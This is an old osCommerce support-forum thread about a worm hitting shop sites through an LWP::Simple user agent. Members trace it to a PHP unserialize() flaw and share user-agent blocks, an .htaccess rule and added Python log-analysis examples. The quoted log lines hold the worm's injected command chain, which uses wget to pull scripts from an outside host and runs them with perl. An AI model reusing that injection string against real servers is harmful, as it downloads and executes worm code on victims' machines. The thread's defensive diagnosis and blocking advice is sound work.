
User Agent of "lwp::simple/5.803"


BoulderDash


Posted

Hey there guys,

I'm using a modified "Who's Online" and see the following on my site:

IP: 67.18.29.154

User Agent: lwp::simple/5.803

Last Click: /index.php/cPath/117_164?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoder

Session ID: http://www.visualcoders.net/spy.gif?

What is the above (a spider, a customer, some cheesy script)? I once read an article that stated that Amazon.com blocked all LWP requests... are they bad? How would I block them in osCommerce if they are?

Thanks a ton in advance for anyone looking into this,

BD

Posted

I had 50 different server IPs, mostly xxxxxx.somehostingcompany.com, for the 25th, so it must be doing something.

I just added this to my application top and other index.php pages.

$ua = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : '';
if (strpos($ua, 'lwp-trivial') !== false) { exit; } // strpos() returns 0 for a match at the start of the string, so compare with false rather than > 0

At least I won't wake up tomorrow with bandwidth exceeded problems.

Thanks for the tip.

Posted

FYI,

lwp::simple is a perl mod. LWP stands for Library for WWW in Perl (I think).

As the name alludes, "simple" means this version does not have the bells and whistles of other mods.

LWP is used for automating tasks with websites. Unless you are running this against your own site, there would likely be no "decent" use of it. Bots that use LWP likely change their user agent to something recognizable.

user99999999,

As I understand, lwp-trivial is the default user agent for lwp::simple. Disabling the requests from lwp-trivial may work today... but I'm sure that one day the code could change the user agent to something else or something random.

Just my 2 cents and I hope I didn't bore anyone too much,

Robert

Posted

So,

Is there some way to block these types of "wget" requests (which aren't really customers)? I mean, even the osC ID they create is phoney.

Thanks,

BD

Posted

Thanks Rob. I knew that since I used it many years before switching to cURL. The user agent can easily be changed for any client; it's not meant to indicate who they are but rather who I am. I think I will block all LWP as these tend to be bots, email harvesters, and worms made by someone that didn't know what they are doing; any useful search spider or client browser would never use this.

Posted

I also had this worm attack start yesterday and asked my host for help. Here's their reply.

You must upgrade your cart ASAP. There is a security breach in it allowing hackers to run commands on the server :( Get someone on this right away; LMK. We have to disable your /www/ folder in the meantime - or at least the cart's php scripts.

See this part &cmd=cd%20/tmp;

The script should not allow "cmd".

216.67.227.252 - - [26/Dec/2004:01:45:27 -0500] "GET /index.php/cPath/133?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 45875 "-" "LWP::Simple/5.801"

So they shut down my site and I do not know how to disallow cmd. Can anyone help me out? Is my host pinpointing the correct problem?

Millie
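As an added example that is not code from this thread or from osCommerce, the Python script below picks the request Millie and BD saw out of Apache combined-format access log lines and decodes what the cmd= parameter was asking the server to run. The first sample line is copied from Millie's post; the other two are constructed for the example, and shop.example / evil.example are placeholders.

```python
"""Added example (not from the thread or osCommerce): find requests that carry
a URL where a session id belongs, plus a cmd= parameter, in Apache combined-format
access logs, and decode the injected command chain.
"""
import re
from urllib.parse import unquote, urlsplit

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# a parameter value that begins with a URL scheme ("http://", "ftp://", ...)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)

SAMPLE_LOG = [
    # copied from Millie's post in this thread
    '216.67.227.252 - - [26/Dec/2004:01:45:27 -0500] "GET /index.php/cPath/133'
    '?osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;'
    'wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;'
    'wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;'
    'wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;'
    'perl%20ownz.txt;perl%20php.txt HTTP/1.1" 200 45875 "-" "LWP::Simple/5.801"',
    # constructed: an ordinary shopper with a normal 32-character osCsid
    '10.0.0.7 - - [26/Dec/2004:01:46:02 -0500] "GET /index.php?cPath=117_164'
    '&osCsid=3f2a9c0d8b7e6f5a4c3b2a1908f7e6d5 HTTP/1.1" 200 31244 '
    '"http://shop.example/" "Mozilla/5.0"',
    # constructed: the same injection with the URL percent-encoded
    '10.0.0.9 - - [26/Dec/2004:01:47:11 -0500] "GET /index.php'
    '?osCsid=http%3A%2F%2Fevil.example%2Fspy.gif%3F&cmd=id HTTP/1.1" '
    '200 31244 "-" "LWP::Simple/5.803"',
]


def parse_query(query):
    """Split a raw query string on '&' and percent-decode names and values.

    Done by hand rather than with parse_qsl() so that the ';' separators inside
    the worm's cmd= value stay part of that value on every Python version.
    """
    pairs = []
    for part in query.split('&'):
        if part:
            name, _, value = part.partition('=')
            pairs.append((unquote(name), unquote(value)))
    return pairs


def analyse(line):
    """Describe one log line, or return None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    params = parse_query(urlsplit(m.group('target')).query)
    remote_urls = [(n, v) for n, v in params if SCHEME_RE.match(v)]
    commands = []
    for name, value in params:
        if name == 'cmd':
            # the payload is a shell command chain joined with ';'
            commands = [c.strip() for c in value.split(';') if c.strip()]
    return {
        'ip': m.group('ip'),
        'user_agent': m.group('ua'),
        'remote_urls': remote_urls,   # parameters whose decoded value is a URL
        'commands': commands,         # decoded cmd= chain, one entry per command
        'suspicious': bool(remote_urls or commands),
    }


def fetched_files(commands):
    """URLs that a decoded command chain would download with wget."""
    return [c.split(None, 1)[1] for c in commands if c.startswith('wget ')]


if __name__ == '__main__':
    for line in SAMPLE_LOG:
        hit = analyse(line)
        if hit and hit['suspicious']:
            print(hit['ip'], hit['user_agent'])
            print('  injected URLs:', hit['remote_urls'])
            print('  commands     :', hit['commands'])
            print('  would fetch  :', fetched_files(hit['commands']))
```

Run against a real access log, the "would fetch" list is what to hand to the host: it names the files the request tried to pull onto the box, which is what to look for in /tmp. The third sample shows why matching on the literal string "http://" in the log is not enough; the same payload arrives percent-encoded and only reads as a URL after decoding.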

Posted

I think I will block all LWP as these tend to be bots, email harvesters, and worms made by someone that didn't know what they are doing; any useful search spider or client browser would never use this.

Excellent point... I did not mean that you would be wasting time... just not to expect 100% protection. (I wasn't clear-minded at 2am)

I also had this worm attack start yesterday and asked my host for help. Here's their reply.

So they shut down my site and I do not know how to disallow cmd. Can anyone help me out? Is my host pinpointing the correct problem?

Millie

Yeah... I suggest that you change hosts. The best solution is for your host to upgrade to PHP 4.3.10. I love my host but can not mention it by name. (It does have a large blue banner in the header.) They can get pricey but you get what you pay for.

The good news is that it does not seem that your site is down. I looked at the site in your profile and it's up and running.

Posted

Yeah... I suggest that you change hosts. The best solution is for your host to upgrade to PHP 4.3.10.

I am severely lacking in information and do not know if there is credibility to my host stating that there is a security issue with osCommerce (running cmd) or if all the responsibility lies with the version of PHP being run. I have a backup site on another host and I could begin switching but I do not want to take a security threat with me.

The good news is that it does not seem that your site is down. I looked at the site in your profile and it's up and running.

Sadly, that is not the site of concern. My income-producing site has been disabled. It's up to me to educate my host, if appropriate, or fix the security issue. Can you point me towards applicable web resources for further research?

Millie

Posted

To make a long story short, I do not believe there is a problem with osCommerce. (I am not an expert or a team member, just some guy with a PC.)

I did not hear of any problems from the worm to osCommerce sites other than it using up bandwidth (the worm tries and tries but doesn't succeed). As I understand it, PHP 4.3.10 is not vulnerable at all.

BTW, your host turned off your site, which is different than the worm causing some direct damage.

1st, you should ask your host to provide information about the security breach that they are claiming. They are the experts and you are paying them. (Getting multiple requests from a worm is not a breach.)

2nd, you should ask your host to upgrade PHP to 4.3.10. It's been out for over a week and it resolves eight (8) "Very Serious" issues. More info...

3rd, you can refer your host to the many sites that say it's a phpBB 2.x problem, not an osC problem:

http://wordpress.org/support/7/19285

or

http://securityresponse.symantec.com/avcen...rl.santy.c.html

Perhaps another board user could help provide information that is more convincing to your host.

Hope that helps,

Robert

P.S. I still think it's a bit amateurish for your host to send an email with "LMK".

Posted

So,

Would the following (placed at the top of "~/includes/application_top.php") stop them from taking bandwidth and data, since they can't really "cmd" anything with osC:

$ua = isset($_SERVER['HTTP_USER_AGENT']) ? strtolower($_SERVER['HTTP_USER_AGENT']) : ''; // lower-case so "LWP::Simple" matches too
// strpos() returns 0 when the match starts at offset 0, so test !== false rather than > 0
if (strpos($ua, 'lwp::simple') !== false) { exit; }
if (strpos($ua, 'lwp-trivial') !== false) { exit; }

Thanks!

BD

Posted

This is the problem:

A serious bug was discovered in php in function unserialize(). That bug can be used to cause serious damage to websites that use software that uses that function.

And this can only be resolved either by tracking down any and every php script that might use that function (on the whole server) - or by your host upgrading that server to PHP 4.3.10 or PHP 5+.

Vger

Posted

My host's PHP is 4.3.10 and they still said there was an issue. However, I do not know if they upgraded after the attack or not. They just told me that my site's index and articles.php were used to send about 60M/s worth of data out on Christmas Day.

Posted

This worm works not just by sending your data out, but also by putting data into your site - so if it had been the worm I would have expected your site to be defaced at the same time that the data was sent out. I would just check to make sure that you are not running any insecure and/or outdated scripts such as phpBB, Invision Board, VBulletin, phpNuke, Post Nuke etc. Provided that you're not, and your host has upgraded to php 4.3.10, this should not be an issue for you in future.

Vger

My host's PHP is 4.3.10 and they still said there was an issue. However, I do not know if they upgraded after the attack or not. They just told me that my site's index and articles.php were used to send about 60M/s worth of data out on Christmas Day.

Posted

What puzzles me is that this is the Santy.C worm, which is trying to attack phpBB forums. It does not exploit a flaw in PHP itself. It is not clear to me, from descriptions of the worm I have read, that there is a reason for it to try to attack sites without phpBB, but I have seen it try on my site that doesn't have phpBB. See http://securityresponse.symantec.com/avcen...rl.santy.c.html

I added the following code to my .htaccess to block it and similar worms:

RewriteEngine On
# refuse any request whose raw query string contains ":/" (e.g. "http://" injected into a parameter)
RewriteCond %{QUERY_STRING} :/ [NC]
# "-" leaves the URL untouched; [F] answers 403 Forbidden
RewriteRule ^ - [F]
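An added example, not from the thread or from osCommerce: the Python below models what the RewriteCond in Steve's post actually tests. mod_rewrite matches %{QUERY_STRING} as it arrived on the wire, before any percent-decoding, so a request that sends ":" and "/" as %3A and %2F passes the rule even though PHP decodes it back into the same URL. The query strings are constructed for the example; evil.example and partner.example are placeholders.

```python
"""Added example (not from the thread or osCommerce): what
    RewriteCond %{QUERY_STRING} :/ [NC]
    RewriteRule ^ - [F]
does and does not catch. htaccess_rule_blocks() models the rule on the raw,
undecoded query string, which is what mod_rewrite sees in %{QUERY_STRING};
decoded_check_blocks() is the stricter test the application itself would need.
"""
import re
from urllib.parse import unquote

# a parameter value that begins with a URL scheme ("http://", "ftp://", ...)
SCHEME_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.I)


def htaccess_rule_blocks(raw_query):
    """True if the RewriteCond above fires: the two characters ':/' anywhere in the raw string."""
    return re.search(r':/', raw_query, re.I) is not None


def decoded_check_blocks(raw_query):
    """Percent-decode every value first, then refuse any value that is a URL,
    whatever the parameter is called."""
    for part in raw_query.split('&'):
        _, _, value = part.partition('=')
        if SCHEME_RE.match(unquote(value)):
            return True
    return False


CASES = {
    # the worm's query string from the thread, payload shortened
    'worm_raw': 'osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt',
    # constructed: an ordinary shopper
    'shopper': 'cPath=117_164&osCsid=3f2a9c0d8b7e6f5a4c3b2a1908f7e6d5',
    # constructed: the same injection with ':' and '/' percent-encoded
    'worm_encoded': 'osCsid=http%3A%2F%2Fevil.example%2Fspy.gif%3F&cmd=id',
    # constructed: a harmless parameter that legitimately carries a URL
    'url_param': 'ref=http://partner.example/page&cPath=22',
}


def evaluate(cases=CASES):
    """Map each case to (blocked by the .htaccess rule, blocked by the decoded check)."""
    return {name: (htaccess_rule_blocks(q), decoded_check_blocks(q))
            for name, q in cases.items()}


if __name__ == '__main__':
    for name, (rule, decoded) in evaluate().items():
        print(f'{name:13} .htaccess rule: {str(rule):5} decoded check: {decoded}')
```

The worm_encoded case is the rule's blind spot, and url_param shows its cost: any legitimate parameter that carries a URL is refused too (osCommerce's own links do not, so on a stock cart that is tolerable). It is a stop-gap to save bandwidth while the host moves to PHP 4.3.10, not a substitute for the upgrade.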

Posted

Yes Steve, the situation is a little confusing. Originally this worm was something that only attacked insecurities in certain software such as phpBB, but then they found out it could be used to hack VBulletin, Invision Board etc. In its next development it was found that it could attack any version of PHP itself that was not secure. It then became the first PHP Worm. This vulnerability includes all versions of PHP up to and including php 4.3.9. The only 'safe' PHP versions are 4.3.10 and 5+.

This was posted on www.phpbbstyles.com AFTER phpBB itself was patched, with the effect that if phpBB was on an insecure server it needed a further patch applied to protect it.

A serious bug was discovered in php in function unserialize(). That bug can be used to cause serious damage to websites that use software that uses that function. Unfortunately phpBB uses that function to store data in cookies, so phpBB can be exploited (so is IPB, vBulletin and almost all other php forum systems).

Vger

Posted

Ah, isn't this fun! (Not!) Luckily my host had already done the appropriate PHP updates as soon as they came out. As has been noted, the worm exploiting the PHP bug is not really Santy, but something that borrows some of its techniques.

I see some uses of unserialize in osCommerce. Some seem to be a function of the same name declared in classes/shopping_cart.php, but there are references in classes/sessions.php and functions/cache.php that may be using the PHP function. So, it is clearly a requirement to make sure your host keeps up with PHP updates.
